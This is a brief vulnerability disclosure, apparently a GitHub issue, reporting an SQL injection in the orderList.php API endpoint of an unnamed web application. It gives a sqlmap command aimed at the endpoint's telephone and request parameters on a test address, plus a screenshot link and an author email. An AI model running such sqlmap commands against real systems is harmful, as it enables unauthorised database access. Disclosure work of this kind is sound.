SQL Injection exists : /controller/api/orderList.php sqlmap -u "http://10.211.55.10/controller/api/orderList.php?telephone=1&request=1" <img width="901" alt="image" src="https://user-images.githubusercontent.com/29982232/67927450-952eae80-fbf3-11e9-925c-77c36d612f32.png"> author:kejie.chen@dbappsecurity.com.cn